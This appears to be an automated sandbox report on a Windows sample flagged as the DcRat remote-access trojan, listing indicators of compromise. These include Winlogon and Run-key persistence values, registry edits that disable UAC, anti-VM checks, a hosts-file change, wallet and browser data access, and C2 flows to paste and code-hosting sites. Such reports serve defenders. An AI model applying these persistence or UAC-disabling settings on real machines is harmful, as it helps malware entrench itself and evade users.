Analysis
max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240611-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21-06-2024 02:26

Static task: static1
Behavioral task: behavioral1
  Sample: 48a8ee49651a74a74baca1f7c94729e5.exe
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: 48a8ee49651a74a74baca1f7c94729e5.exe
  Resource: win10v2004-20240611-en

General
Target: 48a8ee49651a74a74baca1f7c94729e5.exe
Size: 11.5MB
MD5: 48a8ee49651a74a74baca1f7c94729e5
SHA1: 0339e2c61f6cdb9e37ca03f9d97e7811593eba23
SHA256: 9ce7950dbd49b8c82b25df40fa94e88830361b8625d2f91214fa7583a346f992
SHA512: 6bd551233c93c3fbe66b8eec7f5ae2f8d8b42b0918ff13384823c3ebb4d5993a6af3f2ec4280880d396414a9a770ee0dc909b78ae4a98579f32ba2a2855f1448
SSDEEP: 196608:tHHbgJSiavNLVOOHrVB71ZwMFOc3aVeYz4t/+KwgPuZ9RaD:h7gJA3tHMC3a5z4XwgPo9y

Malware Config

Signatures

DcRat
DarkCrystal (DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

Modifies WinLogon for persistence (2 TTPs, 4 IoCs)
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\agentInto\\conhost.exe\"" | fontsessionruntime.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\agentInto\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\conhost.exe\"" | fontsessionruntime.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\agentInto\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\conhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Application Data\\cmd.exe\"" | fontsessionruntime.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\agentInto\\conhost.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\conhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Application Data\\cmd.exe\", \"C:\\Program Files\\Microsoft Office 15\\ClientX64\\System.exe\"" | fontsessionruntime.exe

Process spawned unexpected child process (12 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5996 | 1856 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5748 | 1856 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4772 | 1856 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4808 | 1856 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5464 | 1856 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5576 | 1856 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5580 | 1856 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2000 | 1856 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5924 | 1856 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5224 | 1856 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5428 | 1856 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4132 | 1856 | schtasks.exe

Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | fontsessionruntime.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | System.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | System.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | System.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | fontsessionruntime.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | fontsessionruntime.exe

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe | dcrat
behavioral2/memory/5868-2020-0x0000000000650000-0x0000000000A52000-memory.dmp | dcrat
C:\Program Files (x86)\Windows Photo Viewer\conhost.exe | dcrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoCs)
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Blocklisted process makes network request (2 IoCs)
Processes:
flow | pid | process
29 | 4976 | SolaraBootstrapper.exe
32 | 4976 | SolaraBootstrapper.exe

Processes:
pid | process
6040 | powershell.exe
5160 | powershell.exe
5548 | powershell.exe

Drops file in Drivers directory (3 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Windows\System32\drivers\etc\hosts | attrib.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | attrib.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | Built.exe

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Checks computer location settings (2 TTPs, 15 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | 48a8ee49651a74a74baca1f7c94729e5.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | x12.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | x11.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | x9.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | x8.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | x7.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | x6.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | fontsessionruntime.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | x4.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | CheatLauncherV2.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | SolaraBootstrapper.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | WScript.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | x10.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | x5.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | DCRatBuild.exe

Executes dropped EXE (18 IoCs)
Processes:
pid | process
4256 | x12.exe
3760 | x11.exe
3272 | x10.exe
1068 | x9.exe
936 | x8.exe
1920 | x7.exe
2212 | x6.exe
1084 | x5.exe
3164 | x4.exe
4300 | CheatLauncherV2.exe
1264 | DCRatBuild.exe
2092 | Built.exe
4976 | SolaraBootstrapper.exe
2656 | Built.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5868 | fontsessionruntime.exe
1804 | rar.exe
5760 | System.exe

Loads dropped DLL (22 IoCs)
Processes:
pid | process
2656 | Built.exe
2656 | Built.exe
2656 | Built.exe
2656 | Built.exe
2656 | Built.exe
2656 | Built.exe
2656 | Built.exe
2656 | Built.exe
2656 | Built.exe
2656 | Built.exe
2656 | Built.exe
2656 | Built.exe
2656 | Built.exe
2656 | Built.exe
2656 | Built.exe
2656 | Built.exe
2656 | Built.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials.

Processes:
resource | yara_rule
behavioral2/memory/4028-1804-0x0000000180000000-0x0000000180B15000-memory.dmp | themida
behavioral2/memory/4028-1806-0x0000000180000000-0x0000000180B15000-memory.dmp | themida
behavioral2/memory/4028-1807-0x0000000180000000-0x0000000180B15000-memory.dmp | themida
behavioral2/memory/4028-1805-0x0000000180000000-0x0000000180B15000-memory.dmp | themida
behavioral2/memory/4028-2134-0x0000000180000000-0x0000000180B15000-memory.dmp | themida
behavioral2/memory/4028-2178-0x0000000180000000-0x0000000180B15000-memory.dmp | themida
behavioral2/memory/4028-2180-0x0000000180000000-0x0000000180B15000-memory.dmp | themida
behavioral2/memory/4028-2181-0x0000000180000000-0x0000000180B15000-memory.dmp | themida
behavioral2/memory/4028-2183-0x0000000180000000-0x0000000180B15000-memory.dmp | themida
behavioral2/memory/4028-2203-0x0000000180000000-0x0000000180B15000-memory.dmp | themida
behavioral2/memory/4028-2205-0x0000000180000000-0x0000000180B15000-memory.dmp | themida
behavioral2/memory/4028-2207-0x0000000180000000-0x0000000180B15000-memory.dmp | themida
behavioral2/memory/4028-2259-0x0000000180000000-0x0000000180B15000-memory.dmp | themida
behavioral2/memory/4028-2270-0x0000000180000000-0x0000000180B15000-memory.dmp | themida
behavioral2/memory/4028-2291-0x0000000180000000-0x0000000180B15000-memory.dmp | themida
behavioral2/memory/4028-2293-0x0000000180000000-0x0000000180B15000-memory.dmp | themida

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI20922\python312.dll | upx
behavioral2/memory/2656-163-0x00007FFEE2AE0000-0x00007FFEE31A5000-memory.dmp | upx
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_ctypes.pyd | upx
behavioral2/memory/2656-169-0x00007FFEEF070000-0x00007FFEEF095000-memory.dmp | upx
C:\Users\Admin\AppData\Local\Temp\_MEI20922\libffi-8.dll | upx
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_ssl.pyd | upx
behavioral2/memory/2656-187-0x00007FFEF8840000-0x00007FFEF884F000-memory.dmp | upx
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_sqlite3.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_socket.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_queue.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_lzma.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_hashlib.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_decimal.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_bz2.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI20922\unicodedata.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI20922\sqlite3.dll | upx
C:\Users\Admin\AppData\Local\Temp\_MEI20922\select.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI20922\libssl-3.dll | upx
C:\Users\Admin\AppData\Local\Temp\_MEI20922\libcrypto-3.dll | upx
behavioral2/memory/2656-193-0x00007FFEE2AB0000-0x00007FFEE2ADD000-memory.dmp | upx
behavioral2/memory/2656-195-0x00007FFEEA580000-0x00007FFEEA59A000-memory.dmp | upx
behavioral2/memory/2656-199-0x00007FFEE2900000-0x00007FFEE2A7E000-memory.dmp | upx
behavioral2/memory/2656-198-0x00007FFEE2A80000-0x00007FFEE2AA4000-memory.dmp | upx
behavioral2/memory/2656-203-0x00007FFEF39F0000-0x00007FFEF39FD000-memory.dmp | upx
behavioral2/memory/2656-202-0x00007FFEE4A70000-0x00007FFEE4A89000-memory.dmp | upx
behavioral2/memory/2656-205-0x00007FFEE28C0000-0x00007FFEE28F3000-memory.dmp | upx
behavioral2/memory/2656-209-0x00007FFEE27F0000-0x00007FFEE28BD000-memory.dmp | upx
behavioral2/memory/2656-210-0x00007FFEE22C0000-0x00007FFEE27E9000-memory.dmp | upx
behavioral2/memory/2656-295-0x00007FFEFBD60000-0x00007FFEFBD74000-memory.dmp | upx
behavioral2/memory/2656-333-0x00007FFEFBD50000-0x00007FFEFBD5D000-memory.dmp | upx
behavioral2/memory/2656-450-0x00007FFEF3360000-0x00007FFEF347B000-memory.dmp | upx
behavioral2/memory/2656-417-0x00007FFEEF070000-0x00007FFEEF095000-memory.dmp | upx
behavioral2/memory/2656-332-0x00007FFEE2AE0000-0x00007FFEE31A5000-memory.dmp | upx
behavioral2/memory/2656-2074-0x00007FFEE2900000-0x00007FFEE2A7E000-memory.dmp | upx
behavioral2/memory/2656-2080-0x00007FFEE22C0000-0x00007FFEE27E9000-memory.dmp | upx
behavioral2/memory/2656-2078-0x00007FFEE27F0000-0x00007FFEE28BD000-memory.dmp | upx
behavioral2/memory/2656-2077-0x00007FFEE28C0000-0x00007FFEE28F3000-memory.dmp | upx
behavioral2/memory/2656-2068-0x00007FFEE2AE0000-0x00007FFEE31A5000-memory.dmp | upx
behavioral2/memory/2656-2073-0x00007FFEE2A80000-0x00007FFEE2AA4000-memory.dmp | upx
behavioral2/memory/2656-2072-0x00007FFEEA580000-0x00007FFEEA59A000-memory.dmp | upx
behavioral2/memory/2656-2069-0x00007FFEEF070000-0x00007FFEEF095000-memory.dmp | upx
behavioral2/memory/2656-2150-0x00007FFEF3360000-0x00007FFEF347B000-memory.dmp | upx
behavioral2/memory/2656-2156-0x00007FFEE2A80000-0x00007FFEE2AA4000-memory.dmp | upx
behavioral2/memory/2656-2155-0x00007FFEEA580000-0x00007FFEEA59A000-memory.dmp | upx
behavioral2/memory/2656-2154-0x00007FFEE2AB0000-0x00007FFEE2ADD000-memory.dmp | upx
behavioral2/memory/2656-2153-0x00007FFEF8840000-0x00007FFEF884F000-memory.dmp | upx
behavioral2/memory/2656-2152-0x00007FFEEF070000-0x00007FFEEF095000-memory.dmp | upx
behavioral2/memory/2656-2151-0x00007FFEE2AE0000-0x00007FFEE31A5000-memory.dmp | upx
behavioral2/memory/2656-2149-0x00007FFEFBD50000-0x00007FFEFBD5D000-memory.dmp | upx
behavioral2/memory/2656-2148-0x00007FFEFBD60000-0x00007FFEFBD74000-memory.dmp | upx
behavioral2/memory/2656-2147-0x00007FFEE22C0000-0x00007FFEE27E9000-memory.dmp | upx
behavioral2/memory/2656-2142-0x00007FFEE2900000-0x00007FFEE2A7E000-memory.dmp | upx
behavioral2/memory/2656-2145-0x00007FFEE28C0000-0x00007FFEE28F3000-memory.dmp | upx
behavioral2/memory/2656-2144-0x00007FFEF39F0000-0x00007FFEF39FD000-memory.dmp | upx
behavioral2/memory/2656-2143-0x00007FFEE4A70000-0x00007FFEE4A89000-memory.dmp | upx
behavioral2/memory/2656-2146-0x00007FFEE27F0000-0x00007FFEE28BD000-memory.dmp | upx

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 8 IoCs)
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\agentInto\\conhost.exe\"" | fontsessionruntime.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\agentInto\\conhost.exe\"" | fontsessionruntime.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\conhost.exe\"" | fontsessionruntime.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\conhost.exe\"" | fontsessionruntime.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Users\\Admin\\AppData\\Local\\Application Data\\cmd.exe\"" | fontsessionruntime.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Users\\Admin\\AppData\\Local\\Application Data\\cmd.exe\"" | fontsessionruntime.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Microsoft Office 15\\ClientX64\\System.exe\"" | fontsessionruntime.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Microsoft Office 15\\ClientX64\\System.exe\"" | fontsessionruntime.exe

Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | System.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | System.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | fontsessionruntime.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | fontsessionruntime.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 10 IoCs)
Processes:
flow | ioc
73 | raw.githubusercontent.com
114 | pastebin.com
32 | raw.githubusercontent.com
42 | raw.githubusercontent.com
41 | raw.githubusercontent.com
72 | raw.githubusercontent.com
79 | raw.githubusercontent.com
113 | pastebin.com
31 | raw.githubusercontent.com
40 | raw.githubusercontent.com

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
83 | ip-api.com

Hide Artifacts: Hidden Files and Directories (1 TTPs, 1 IoCs)

Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoCs)
Processes:
pid | process
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Drops file in Program Files directory (50 IoCs)
Processes:
description | ioc | process
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-kn.hyb | msedgewebview2.exe
File created | C:\Program Files\Microsoft Office 15\ClientX64\System.exe | fontsessionruntime.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_96477555\manifest.json | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-und-ethi.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\manifest.json | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\_metadata\verified_contents.json | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-en-us.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-eu.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-de-1901.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-en-gb.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-es.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-et.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-sl.hyb | msedgewebview2.exe
File created | C:\Program Files (x86)\Windows Photo Viewer\088424020bedd6 | fontsessionruntime.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_96477555\manifest.fingerprint | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-cu.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-tk.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_128776481\manifest.fingerprint | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_128776481\manifest.json | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-pt.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\manifest.fingerprint | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-bn.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-te.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-nn.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-ta.hyb | msedgewebview2.exe
File created | C:\Program Files (x86)\Windows Photo Viewer\conhost.exe | fontsessionruntime.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-bg.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-gu.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_128776481\crl-set | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-ga.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-de-ch-1901.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-or.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-pa.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_96477555\protocols.json | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-cy.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-fr.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-mr.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-nb.hyb | msedgewebview2.exe
File created | C:\Program Files\Microsoft Office 15\ClientX64\27d1bcfc3c54e0 | fontsessionruntime.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-as.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-hr.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-hu.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-la.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-mn-cyrl.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-da.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-de-1996.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-hy.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-ml.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-be.hyb | msedgewebview2.exe
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-hi.hyb | msedgewebview2.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Event Triggered Execution: Netsh Helper DLL (1 TTPs, 3 IoCs)
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe

Detects videocard installed (1 TTPs, 1 IoCs)
Uses WMIC.exe to determine the videocard installed.

Enumerates processes with tasklist (1 TTPs, 4 IoCs)
Processes:
pid | process
3232 | tasklist.exe
1264 | tasklist.exe
5780 | tasklist.exe
5756 | tasklist.exe

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedgewebview2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedgewebview2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedgewebview2.exe

Gathers system information (1 TTPs, 1 IoCs)
Runs systeminfo.exe.

Modifies data under HKEY_USERS (2 IoCs)
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | msedgewebview2.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133634103945811158" | msedgewebview2.exe

Modifies registry class (2 IoCs)
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings | DCRatBuild.exe
Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings | fontsessionruntime.exe

Runs ping.exe (1 TTPs, 1 IoCs)

Scheduled Task/Job: Scheduled Task (1 TTPs, 12 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
5428 | schtasks.exe
5996 | schtasks.exe
5748 | schtasks.exe
4772 | schtasks.exe
4808 | schtasks.exe
2000 | schtasks.exe
5924 | schtasks.exe
5224 | schtasks.exe
4132 | schtasks.exe
5464 | schtasks.exe
5576 | schtasks.exe
5580 | schtasks.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes:
pid | process
4976 | SolaraBootstrapper.exe
4976 | SolaraBootstrapper.exe
5160 | powershell.exe
5160 | powershell.exe
5924 | powershell.exe
5924 | powershell.exe
5548 | powershell.exe
5548 | powershell.exe
6040 | powershell.exe
6040 | powershell.exe
2928 | powershell.exe
2928 | powershell.exe
5160 | powershell.exe
6040 | powershell.exe
5924 | powershell.exe
5548 | powershell.exe
2928 | powershell.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5316 | powershell.exe
5316 | powershell.exe
5316 | powershell.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5348 | powershell.exe
5348 | powershell.exe
5348 | powershell.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5868 | fontsessionruntime.exe
5868 | fontsessionruntime.exe
5868 | fontsessionruntime.exe
5868 | fontsessionruntime.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5868 | fontsessionruntime.exe
5868 | fontsessionruntime.exe
5868 | fontsessionruntime.exe
5868 | fontsessionruntime.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5244 | powershell.exe
5244 | powershell.exe
5244 | powershell.exe
3168 | powershell.exe
3168 | powershell.exe
3168 | powershell.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
4028 | cd57e4c171d6e8f5ea8b8f824a6a7316.exe
